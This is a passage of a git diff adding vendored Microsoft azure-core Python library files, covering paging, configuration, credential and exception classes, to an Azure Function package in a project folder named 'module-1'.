+ :type request: ~azure.core.rest.HttpRequest + :keyword bool stream: Whether the response payload will be streamed. Defaults to False. + :return: The response of your network call. Does not do error handling on your response. + :rtype: ~azure.core.rest.AsyncHttpResponse + """ + wrapped = self._make_pipeline_call(request, stream=stream, **kwargs) + return _AsyncContextManager(wrapped=wrapped) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/_version.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/_version.py new file mode 100644 index 0000000..28480fe --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/_version.py @@ -0,0 +1,12 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is +# regenerated. +# -------------------------------------------------------------------------- + +VERSION = "1.24.2" diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/async_paging.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/async_paging.py new file mode 100644 index 0000000..2665a5c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/async_paging.py @@ -0,0 +1,163 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. 
+#
+# --------------------------------------------------------------------------
+import collections.abc
+import logging
+from typing import (
+    Iterable,
+    AsyncIterator,
+    TypeVar,
+    Callable,
+    Tuple,
+    Optional,
+    Awaitable,
+)
+
+from .exceptions import AzureError
+
+
+_LOGGER = logging.getLogger(__name__)
+
+ReturnType = TypeVar("ReturnType")
+ResponseType = TypeVar("ResponseType")
+
+__all__ = [
+    "AsyncPageIterator",
+    "AsyncItemPaged"
+]
+
+class AsyncList(AsyncIterator[ReturnType]):
+    def __init__(self, iterable: Iterable[ReturnType]) -> None:
+        """Change an iterable into a fake async iterator.
+
+        Could be useful to fill the async iterator contract when you get a list.
+
+        :param iterable: A sync iterable of T
+        """
+        # Technically, if it's a real iterator, I don't need "iter"
+        # but that will cover iterable and list as well with no troubles created.
+        self._iterator = iter(iterable)
+
+    async def __anext__(self) -> ReturnType:
+        try:
+            return next(self._iterator)
+        except StopIteration as err:
+            raise StopAsyncIteration() from err
+
+
+class AsyncPageIterator(AsyncIterator[AsyncIterator[ReturnType]]):
+    def __init__(
+        self,
+        get_next: Callable[
+            [Optional[str]], Awaitable[ResponseType]
+        ],
+        extract_data: Callable[
+            [ResponseType], Awaitable[Tuple[str, AsyncIterator[ReturnType]]]
+        ],
+        continuation_token: Optional[str] = None,
+    ) -> None:
+        """Return an async iterator of pages.
+
+        :param get_next: Callable that takes the continuation token and returns an HTTP response
+        :param extract_data: Callable that takes an HTTP response and returns a tuple of
+            (continuation token, list of ReturnType)
+        :param str continuation_token: The continuation token needed by get_next
+        """
+        self._get_next = get_next
+        self._extract_data = extract_data
+        self.continuation_token = continuation_token
+        self._did_a_call_already = False
+        self._response = None
+        self._current_page = None
+
+    async def __anext__(self):
+        if self.continuation_token is None and self._did_a_call_already:
+            raise StopAsyncIteration("End of paging")
+        try:
+            self._response = await self._get_next(self.continuation_token)
+        except AzureError as error:
+            if not error.continuation_token:
+                error.continuation_token = self.continuation_token
+            raise
+
+        self._did_a_call_already = True
+
+        self.continuation_token, self._current_page = await self._extract_data(
+            self._response
+        )
+
+        # If current_page was a sync list, wrap it async-like
+        if isinstance(self._current_page, collections.abc.Iterable):
+            self._current_page = AsyncList(self._current_page)
+
+        return self._current_page
+
+
+class AsyncItemPaged(AsyncIterator[ReturnType]):
+    def __init__(self, *args, **kwargs) -> None:
+        """Return an async iterator of items.
+
+        args and kwargs will be passed to the AsyncPageIterator constructor directly,
+        except page_iterator_class
+        """
+        self._args = args
+        self._kwargs = kwargs
+        self._page_iterator = (
+            None
+        )  # type: Optional[AsyncIterator[AsyncIterator[ReturnType]]]
+        self._page = None  # type: Optional[AsyncIterator[ReturnType]]
+        self._page_iterator_class = self._kwargs.pop(
+            "page_iterator_class", AsyncPageIterator
+        )
+
+    def by_page(
+        self,
+        continuation_token: Optional[str] = None,
+    ) -> AsyncIterator[AsyncIterator[ReturnType]]:
+        """Get an async iterator of pages of objects, instead of an async iterator of objects.
+
+        :param str continuation_token:
+            An opaque continuation token. This value can be retrieved from the
+            continuation_token field of a previous generator object. 
If specified, + this generator will begin returning results from this point. + :returns: An async iterator of pages (themselves async iterator of objects) + """ + return self._page_iterator_class( + *self._args, **self._kwargs, continuation_token=continuation_token + ) + + async def __anext__(self) -> ReturnType: + if self._page_iterator is None: + self._page_iterator = self.by_page() + return await self.__anext__() + if self._page is None: + # Let it raise StopAsyncIteration + self._page = await self._page_iterator.__anext__() + return await self.__anext__() + try: + return await self._page.__anext__() + except StopAsyncIteration: + self._page = None + return await self.__anext__() diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/configuration.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/configuration.py new file mode 100644 index 0000000..ebd06e1 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/configuration.py @@ -0,0 +1,120 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + + +class Configuration(object): + """Provides the home for all of the configurable policies in the pipeline. + + A new Configuration object provides no default policies and does not specify in what + order the policies will be added to the pipeline. The SDK developer must specify each + of the policy defaults as required by the service and use the policies in the + Configuration to construct the pipeline correctly, as well as inserting any + unexposed/non-configurable policies. + + :ivar headers_policy: Provides parameters for custom or additional headers to be sent with the request. + :ivar proxy_policy: Provides configuration parameters for proxy. + :ivar redirect_policy: Provides configuration parameters for redirects. + :ivar retry_policy: Provides configuration parameters for retries in the pipeline. + :ivar custom_hook_policy: Provides configuration parameters for a custom hook. + :ivar logging_policy: Provides configuration parameters for logging. + :ivar http_logging_policy: Provides configuration parameters for HTTP specific logging. 
+ :ivar user_agent_policy: Provides configuration parameters to append custom values to the + User-Agent header. + :ivar authentication_policy: Provides configuration parameters for adding a bearer token Authorization + header to requests. + :keyword polling_interval: Polling interval while doing LRO operations, if Retry-After is not set. + + .. admonition:: Example: + + .. literalinclude:: ../samples/test_example_config.py + :start-after: [START configuration] + :end-before: [END configuration] + :language: python + :caption: Creates the service configuration and adds policies. + """ + + def __init__(self, **kwargs): + # Headers (sent with every request) + self.headers_policy = None + + # Proxy settings (Currently used to configure transport, could be pipeline policy instead) + self.proxy_policy = None + + # Redirect configuration + self.redirect_policy = None + + # Retry configuration + self.retry_policy = None + + # Custom hook configuration + self.custom_hook_policy = None + + # Logger configuration + self.logging_policy = None + + # Http logger configuration + self.http_logging_policy = None + + # User Agent configuration + self.user_agent_policy = None + + # Authentication configuration + self.authentication_policy = None + + # Polling interval if no retry-after in polling calls results + self.polling_interval = kwargs.get("polling_interval", 30) + + +class ConnectionConfiguration(object): + """HTTP transport connection configuration settings. + + Common properties that can be configured on all transports. Found in the + Configuration object. + + :keyword int connection_timeout: A single float in seconds for the connection timeout. Defaults to 300 seconds. + :keyword int read_timeout: A single float in seconds for the read timeout. Defaults to 300 seconds. + :keyword bool connection_verify: SSL certificate verification. Enabled by default. Set to False to disable, + alternatively can be set to the path to a CA_BUNDLE file or directory with certificates of trusted CAs. + :keyword str connection_cert: Client-side certificates. You can specify a local cert to use as client side + certificate, as a single file (containing the private key and the certificate) or as a tuple of both files' paths. + :keyword int connection_data_block_size: The block size of data sent over the connection. Defaults to 4096 bytes. + + .. admonition:: Example: + + .. literalinclude:: ../samples/test_example_config.py + :start-after: [START connection_configuration] + :end-before: [END connection_configuration] + :language: python + :dedent: 4 + :caption: Configuring transport connection settings. + """ + + def __init__(self, **kwargs): + self.timeout = kwargs.pop('connection_timeout', 300) + self.read_timeout = kwargs.pop('read_timeout', 300) + self.verify = kwargs.pop('connection_verify', True) + self.cert = kwargs.pop('connection_cert', None) + self.data_block_size = kwargs.pop('connection_data_block_size', 4096) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/credentials.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/credentials.py new file mode 100644 index 0000000..79dc373 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/credentials.py @@ -0,0 +1,163 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. 
See LICENSE.txt in the project root for
+# license information.
+# -------------------------------------------------------------------------
+from collections import namedtuple
+from typing import Any, NamedTuple, Optional
+from typing_extensions import Protocol
+import six
+
+
+class AccessToken(NamedTuple):
+    """Represents an OAuth access token."""
+
+    token: str
+    expires_on: int
+
+AccessToken.token.__doc__ = """The token string."""
+AccessToken.expires_on.__doc__ = """The token's expiration time in Unix time."""
+
+
+class TokenCredential(Protocol):
+    """Protocol for classes able to provide OAuth tokens."""
+
+    def get_token(
+        self, *scopes: str, claims: Optional[str] = None, tenant_id: Optional[str] = None, **kwargs: Any
+    ) -> AccessToken:
+        """Request an access token for `scopes`.
+
+        :param str scopes: The type of access needed.
+
+        :keyword str claims: Additional claims required in the token, such as those returned in a resource
+            provider's claims challenge following an authorization failure.
+        :keyword str tenant_id: Optional tenant to include in the token request.
+
+        :rtype: AccessToken
+        :return: An AccessToken instance containing the token string and its expiration time in Unix time.
+        """
+
+
+AzureNamedKey = namedtuple("AzureNamedKey", ["name", "key"])
+
+
+__all__ = ["AzureKeyCredential", "AzureSasCredential", "AccessToken", "AzureNamedKeyCredential", "TokenCredential"]
+
+
+class AzureKeyCredential(object):
+    """Credential type used for authenticating to an Azure service.
+    It provides the ability to update the key without creating a new client.
+
+    :param str key: The key used to authenticate to an Azure service
+    :raises: TypeError
+    """
+
+    def __init__(self, key):
+        # type: (str) -> None
+        if not isinstance(key, six.string_types):
+            raise TypeError("key must be a string.")
+        self._key = key  # type: str
+
+    @property
+    def key(self):
+        # type: () -> str
+        """The value of the configured key.
+
+        :rtype: str
+        """
+        return self._key
+
+    def update(self, key):
+        # type: (str) -> None
+        """Update the key.
+
+        This can be used when you've regenerated your service key and want
+        to update long-lived clients.
+
+        :param str key: The key used to authenticate to an Azure service
+        :raises: ValueError or TypeError
+        """
+        if not key:
+            raise ValueError("The key used for updating cannot be None or empty")
+        if not isinstance(key, six.string_types):
+            raise TypeError("The key used for updating must be a string.")
+        self._key = key
+
+
+class AzureSasCredential(object):
+    """Credential type used for authenticating to an Azure service.
+    It provides the ability to update the shared access signature without creating a new client.
+
+    :param str signature: The shared access signature used to authenticate to an Azure service
+    :raises: TypeError
+    """
+
+    def __init__(self, signature):
+        # type: (str) -> None
+        if not isinstance(signature, six.string_types):
+            raise TypeError("signature must be a string.")
+        self._signature = signature  # type: str
+
+    @property
+    def signature(self):
+        # type: () -> str
+        """The value of the configured shared access signature.
+
+        :rtype: str
+        """
+        return self._signature
+
+    def update(self, signature):
+        # type: (str) -> None
+        """Update the shared access signature.
+
+        This can be used when you've regenerated your shared access signature and want
+        to update long-lived clients.
+
+        :param str signature: The shared access signature used to authenticate to an Azure service
+        :raises: ValueError or TypeError
+        """
+        if not signature:
+            raise ValueError("The signature used for updating cannot be None or empty")
+        if not isinstance(signature, six.string_types):
+            raise TypeError("The signature used for updating must be a string.")
+        self._signature = signature
+
+
+class AzureNamedKeyCredential(object):
+    """Credential type used for working with any service needing a named key that follows patterns
+    established by the other credential types.
+
+    :param str name: The name of the credential used to authenticate to an Azure service.
+    :param str key: The key used to authenticate to an Azure service.
+    :raises: TypeError
+    """
+
+    def __init__(self, name, key):
+        # type: (str, str) -> None
+        if not isinstance(name, six.string_types) or not isinstance(key, six.string_types):
+            raise TypeError("Both name and key must be strings.")
+        self._credential = AzureNamedKey(name, key)
+
+    @property
+    def named_key(self):
+        # type: () -> AzureNamedKey
+        """The value of the configured name and key.
+
+        :rtype: AzureNamedKey
+        """
+        return self._credential
+
+    def update(self, name, key):
+        # type: (str, str) -> None
+        """Update the named key credential.
+
+        Both name and key must be provided in order to update the named key credential.
+        Individual attributes cannot be updated.
+
+        :param str name: The name of the credential used to authenticate to an Azure service.
+        :param str key: The key used to authenticate to an Azure service.
+        """
+        if not isinstance(name, six.string_types) or not isinstance(key, six.string_types):
+            raise TypeError("Both name and key must be strings.")
+        self._credential = AzureNamedKey(name, key)
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/credentials_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/credentials_async.py
new file mode 100644
index 0000000..9c83170
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/credentials_async.py
@@ -0,0 +1,34 @@
+# ------------------------------------
+# Copyright (c) Microsoft Corporation.
+# Licensed under the MIT License.
+# ------------------------------------
+from typing import Any, Optional
+from typing_extensions import Protocol
+from .credentials import AccessToken as _AccessToken
+
+class AsyncTokenCredential(Protocol):
+    """Protocol for classes able to provide OAuth tokens."""
+
+    async def get_token(
+        self, *scopes: str, claims: Optional[str] = None, tenant_id: Optional[str] = None, **kwargs: Any
+    ) -> _AccessToken:
+        """Request an access token for `scopes`.
+
+        :param str scopes: The type of access needed.
+
+        :keyword str claims: Additional claims required in the token, such as those returned in a resource
+            provider's claims challenge following an authorization failure.
+        :keyword str tenant_id: Optional tenant to include in the token request.
+
+        :rtype: AccessToken
+        :return: An AccessToken instance containing the token string and its expiration time in Unix time. 
+ """ + + async def close(self) -> None: + pass + + async def __aenter__(self): + pass + + async def __aexit__(self, exc_type, exc_value, traceback) -> None: + pass diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/exceptions.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/exceptions.py new file mode 100644 index 0000000..ec96e74 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/exceptions.py @@ -0,0 +1,506 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +import json +import logging +import sys + +from typing import Callable, Any, Dict, Optional, List, Union, Type, TYPE_CHECKING + +_LOGGER = logging.getLogger(__name__) + +if TYPE_CHECKING: + from azure.core.pipeline.transport._base import _HttpResponseBase + + +__all__ = [ + "AzureError", + "ServiceRequestError", + "ServiceResponseError", + "HttpResponseError", + "DecodeError", + "ResourceExistsError", + "ResourceNotFoundError", + "ClientAuthenticationError", + "ResourceModifiedError", + "ResourceNotModifiedError", + "TooManyRedirectsError", + "ODataV4Format", + "ODataV4Error", + "StreamConsumedError", + "StreamClosedError", + "ResponseNotReadError", + "SerializationError", + "DeserializationError", +] + + +def raise_with_traceback(exception, *args, **kwargs): + # type: (Callable, Any, Any) -> None + """Raise exception with a specified traceback. + This MUST be called inside a "except" clause. + + :param Exception exception: Error type to be raised. + :param args: Any additional args to be included with exception. + :keyword str message: Message to be associated with the exception. If omitted, defaults to an empty string. + """ + message = kwargs.pop("message", "") + exc_type, exc_value, exc_traceback = sys.exc_info() + # If not called inside a "except", exc_type will be None. 
Assume it will not happen
+    if exc_type is None:
+        raise ValueError("raise_with_traceback can only be used in except clauses")
+    exc_msg = "{}, {}: {}".format(message, exc_type.__name__, exc_value)
+    error = exception(exc_msg, *args, **kwargs)
+    try:
+        raise error.with_traceback(exc_traceback)
+    except AttributeError:
+        error.__traceback__ = exc_traceback
+        raise error
+
+class ErrorMap(object):
+    """Error Map class. To be used in map_error method, behaves like a dictionary.
+    It returns the error type if it is found in custom_error_map. Otherwise, it returns default_error.
+
+    :param dict custom_error_map: User-defined error map; it is used to map status codes to error types.
+    :keyword error default_error: Default error type. It is returned if the status code is not found in
+        custom_error_map.
+    """
+    def __init__(self, custom_error_map=None, **kwargs):
+        self._custom_error_map = custom_error_map or {}
+        self._default_error = kwargs.pop("default_error", None)
+
+    def get(self, key):
+        ret = self._custom_error_map.get(key)
+        if ret:
+            return ret
+        return self._default_error
+
+def map_error(status_code, response, error_map):
+    if not error_map:
+        return
+    error_type = error_map.get(status_code)
+    if not error_type:
+        return
+    error = error_type(response=response)
+    raise error
+
+
+class ODataV4Format(object):
+    """Class to describe OData V4 error format.
+
+    http://docs.oasis-open.org/odata/odata-json-format/v4.0/os/odata-json-format-v4.0-os.html#_Toc372793091
+
+    Example of JSON:
+
+    error: {
+        "code": "ValidationError",
+        "message": "One or more fields contain incorrect values: ",
+        "details": [
+            {
+                "code": "ValidationError",
+                "target": "representation",
+                "message": "Parsing error(s): String '' does not match regex pattern '^[^{}/ :]+(?: :\\\\d+)?$'.
+                Path 'host', line 1, position 297."
+            },
+            {
+                "code": "ValidationError",
+                "target": "representation",
+                "message": "Parsing error(s): The input OpenAPI file is not valid for the OpenAPI specification
+                https://github.com/OAI/OpenAPI-Specification/blob/master/versions/2.0.md
+                (schema https://github.com/OAI/OpenAPI-Specification/blob/master/schemas/v2.0/schema.json)."
+            }
+        ]
+    }
+
+    :param dict json_object: A Python dict representing an ODataV4 JSON
+    :ivar str ~.code: Its value is a service-defined error code.
+        This code serves as a sub-status for the HTTP error code specified in the response.
+    :ivar str message: Human-readable, language-dependent representation of the error.
+    :ivar str target: The target of the particular error (for example, the name of the property in error).
+        This field is optional and may be None.
+    :ivar list[ODataV4Format] details: Array of ODataV4Format instances that MUST contain name/value pairs
+        for code and message, and MAY contain a name/value pair for target, as described above.
+    :ivar dict innererror: An object. The contents of this object are service-defined.
+        Usually this object contains information that will help debug the service.
+    """
+    CODE_LABEL = "code"
+    MESSAGE_LABEL = "message"
+    TARGET_LABEL = "target"
+    DETAILS_LABEL = "details"
+    INNERERROR_LABEL = "innererror"
+
+    def __init__(self, json_object):
+        if "error" in json_object:
+            json_object = json_object["error"]
+        cls = self.__class__  # type: Type[ODataV4Format]
+
+        # Required fields, but assume they could be missing still to be robust
+        self.code = json_object.get(cls.CODE_LABEL)  # type: Optional[str]
+        self.message = json_object.get(cls.MESSAGE_LABEL)  # type: Optional[str]
+
+        if not (self.code or self.message):
+            raise ValueError("Impossible to extract code/message from received JSON:\n" + json.dumps(json_object))
+
+        # Optional fields
+        self.target = json_object.get(cls.TARGET_LABEL)  # type: Optional[str]
+
+        # details is recursive of this very format
+        self.details = []  # type: List[ODataV4Format]
+        for detail_node in json_object.get(cls.DETAILS_LABEL) or []:
+            try:
+                self.details.append(self.__class__(detail_node))
+            except Exception:  # pylint: disable=broad-except
+                pass
+
+        self.innererror = json_object.get(cls.INNERERROR_LABEL, {})  # type: Dict[str, Any]
+
+    @property
+    def error(self):
+        import warnings
+
+        warnings.warn(
+            "error.error from azure exceptions is deprecated, simply use 'error' once",
+            DeprecationWarning,
+        )
+        return self
+
+    def __str__(self):
+        return "({}) {}\n{}".format(
+            self.code,
+            self.message,
+            self.message_details()
+        )
+
+    def message_details(self):
+        """Return a detailed string of the error.
+        """
+        # () -> str
+        error_str = "Code: {}".format(self.code)
+        error_str += "\nMessage: {}".format(self.message)
+        if self.target:
+            error_str += "\nTarget: {}".format(self.target)
+
+        if self.details:
+            error_str += "\nException Details:"
+            for error_obj in self.details:
+                # Indent for visibility
+                error_str += "\n".join("\t" + s for s in str(error_obj).splitlines())
+
+        if self.innererror:
+            error_str += "\nInner error: {}".format(
+                json.dumps(self.innererror, indent=4)
+            )
+        return error_str
+
+
+class AzureError(Exception):
+    """Base exception for all errors.
+
+    :param message: The message object stringified as 'message' attribute
+    :keyword error: The original exception if any
+    :paramtype error: Exception
+
+    :ivar inner_exception: The exception passed with the 'error' kwarg
+    :vartype inner_exception: Exception
+    :ivar exc_type: The exc_type from sys.exc_info()
+    :ivar exc_value: The exc_value from sys.exc_info()
+    :ivar exc_traceback: The exc_traceback from sys.exc_info()
+    :ivar exc_msg: A string formatting of message parameter, exc_type and exc_value
+    :ivar str message: A stringified version of the message parameter
+    :ivar str continuation_token: A token reference to continue an incomplete operation. This value is optional
+        and will be `None` where continuation is either unavailable or not applicable.
+    """
+
+    def __init__(self, message, *args, **kwargs):
+        self.inner_exception = kwargs.get("error")
+        self.exc_type, self.exc_value, self.exc_traceback = sys.exc_info()
+        self.exc_type = (
+            self.exc_type.__name__ if self.exc_type else type(self.inner_exception)
+        )
+        self.exc_msg = "{}, {}: {}".format(message, self.exc_type, self.exc_value)
+        self.message = str(message)
+        self.continuation_token = kwargs.get('continuation_token')
+        super(AzureError, self).__init__(self.message, *args)
+
+    def raise_with_traceback(self):
+        try:
+            raise super(AzureError, self).with_traceback(self.exc_traceback)
+        except AttributeError:
+            self.__traceback__ = self.exc_traceback
+            raise self
+
+
+class ServiceRequestError(AzureError):
+    """An error occurred while attempting to make a request to the service.
+    No request was sent.
+    """
+
+
+class ServiceResponseError(AzureError):
+    """The request was sent, but the client failed to understand the response.
+    The connection may have timed out. These errors can be retried for idempotent or
+    safe operations."""
+
+class ServiceRequestTimeoutError(ServiceRequestError):
+    """Error raised when a timeout happens"""
+
+class ServiceResponseTimeoutError(ServiceResponseError):
+    """Error raised when a timeout happens"""
+
+class HttpResponseError(AzureError):
+    """A request was made, and a non-success status code was received from the service.
+
+    :param message: HttpResponse's error message
+    :type message: str
+    :param response: The response that triggered the exception.
+    :type response: ~azure.core.pipeline.transport.HttpResponse or ~azure.core.pipeline.transport.AsyncHttpResponse
+
+    :ivar reason: The HTTP response reason
+    :vartype reason: str
+    :ivar status_code: HttpResponse's status code
+    :vartype status_code: int
+    :ivar response: The response that triggered the exception.
+    :vartype response: ~azure.core.pipeline.transport.HttpResponse or ~azure.core.pipeline.transport.AsyncHttpResponse
+    :ivar model: The request body/response body model
+    :vartype model: ~msrest.serialization.Model
+    :ivar error: The formatted error
+    :vartype error: ODataV4Format
+    """
+
+    def __init__(self, message=None, response=None, **kwargs):
+        # Don't want to document this one yet.
+        error_format = kwargs.get("error_format", ODataV4Format)
+
+        self.reason = None
+        self.status_code = None
+        self.response = response
+        if response:
+            self.reason = response.reason
+            self.status_code = response.status_code
+
+        # old autorest are setting "error" before calling __init__, so it might be there already
+        # transferring into self.model
+        model = kwargs.pop("model", None)  # type: Optional[msrest.serialization.Model]
+        if model is not None:  # autorest v5
+            self.model = model
+        else:  # autorest azure-core, for KV 1.0, Storage 12.0, etc.
+            self.model = getattr(
+                self, "error", None
+            )  # type: Optional[msrest.serialization.Model]
+        self.error = self._parse_odata_body(error_format, response)  # type: Optional[ODataV4Format]
+
+        # By priority, message is:
+        # - odatav4 message, OR
+        # - parameter "message", OR
+        # - generic message using "reason"
+        if self.error:
+            message = str(self.error)
+        else:
+            message = message or "Operation returned an invalid status '{}'".format(
+                self.reason
+            )
+
+        super(HttpResponseError, self).__init__(message=message, **kwargs)
+
+    @staticmethod
+    def _parse_odata_body(error_format, response):
+        # type: (Type[ODataV4Format], _HttpResponseBase) -> Optional[ODataV4Format]
+        try:
+            odata_json = json.loads(response.text())
+            return error_format(odata_json)
+        except Exception:  # pylint: disable=broad-except
+            # If the body is not valid JSON, just stop now
+            pass
+        return None
+
+    def __str__(self):
+        retval = super(HttpResponseError, self).__str__()
+        try:
+            body = self.response.text()
+            if body and not self.error:
+                return "{}\nContent: {}".format(retval, body)[:2048]
+        except Exception:  # pylint: disable=broad-except
+            pass
+        return retval
+
+
+class DecodeError(HttpResponseError):
+    """Error raised during response deserialization."""
+
+
+class IncompleteReadError(DecodeError):
+    """Error raised if the peer closes the connection before we have received the complete message body."""
+
+
+class ResourceExistsError(HttpResponseError):
+    """An error response with status code 4xx.
+    This will not be raised directly by the Azure core pipeline."""
+
+
+class ResourceNotFoundError(HttpResponseError):
+    """An error response, typically triggered by a 412 response (for update) or 404 (for get/post)
+    """
+
+
+class ClientAuthenticationError(HttpResponseError):
+    """An error response with status code 4xx.
+    This will not be raised directly by the Azure core pipeline."""
+
+
+class ResourceModifiedError(HttpResponseError):
+    """An error response with status code 4xx, typically 412 Precondition Failed.
+    This will not be raised directly by the Azure core pipeline."""
+
+
+class ResourceNotModifiedError(HttpResponseError):
+    """An error response with status code 304.
+    This will not be raised directly by the Azure core pipeline."""
+
+
+class TooManyRedirectsError(HttpResponseError):
+    """Reached the maximum number of redirect attempts."""
+
+    def __init__(self, history, *args, **kwargs):
+        self.history = history
+        message = "Reached maximum redirect attempts."
+        super(TooManyRedirectsError, self).__init__(message, *args, **kwargs)
+
+
+class ODataV4Error(HttpResponseError):
+    """An HTTP response error where the JSON is decoded as OData V4 error format.
+
+    http://docs.oasis-open.org/odata/odata-json-format/v4.0/os/odata-json-format-v4.0-os.html#_Toc372793091
+
+    :ivar dict odata_json: The parsed JSON body as attribute for convenience.
+    :ivar str ~.code: Its value is a service-defined error code.
+        This code serves as a sub-status for the HTTP error code specified in the response.
+    :ivar str message: Human-readable, language-dependent representation of the error.
+    :ivar str target: The target of the particular error (for example, the name of the property in error).
+        This field is optional and may be None.
+    :ivar list[ODataV4Format] details: Array of ODataV4Format instances that MUST contain name/value pairs
+        for code and message, and MAY contain a name/value pair for target, as described above.
+    :ivar dict innererror: An object. The contents of this object are service-defined.
+        Usually this object contains information that will help debug the service.
+    """
+
+    _ERROR_FORMAT = ODataV4Format
+
+    def __init__(self, response, **kwargs):
+        # type: (_HttpResponseBase, Any) -> None
+
+        # Ensure fields are declared, whatever can happen afterwards
+        self.odata_json = None  # type: Optional[Dict[str, Any]]
+        try:
+            self.odata_json = json.loads(response.text())
+            odata_message = self.odata_json.setdefault("error", {}).get("message")
+        except Exception:  # pylint: disable=broad-except
+            # If the body is not valid JSON, just stop now
+            odata_message = None
+
+        self.code = None  # type: Optional[str]
+        self.message = kwargs.get("message", odata_message)  # type: Optional[str]
+        self.target = None  # type: Optional[str]
+        self.details = []  # type: Optional[List[Any]]
+        self.innererror = {}  # type: Optional[Dict[str, Any]]
+
+        if self.message and "message" not in kwargs:
+            kwargs["message"] = self.message
+
+        super(ODataV4Error, self).__init__(response=response, **kwargs)
+
+        self._error_format = None  # type: Optional[Union[str, ODataV4Format]]
+        if self.odata_json:
+            try:
+                error_node = self.odata_json["error"]
+                self._error_format = self._ERROR_FORMAT(error_node)
+                self.__dict__.update(
+                    {
+                        k: v
+                        for k, v in self._error_format.__dict__.items()
+                        if v is not None
+                    }
+                )
+            except Exception:  # pylint: disable=broad-except
+                _LOGGER.info("Received error message was not valid OData V4 format.")
+                self._error_format = "JSON was invalid for format " + str(
+                    self._ERROR_FORMAT
+                )
+
+    def __str__(self):
+        if self._error_format:
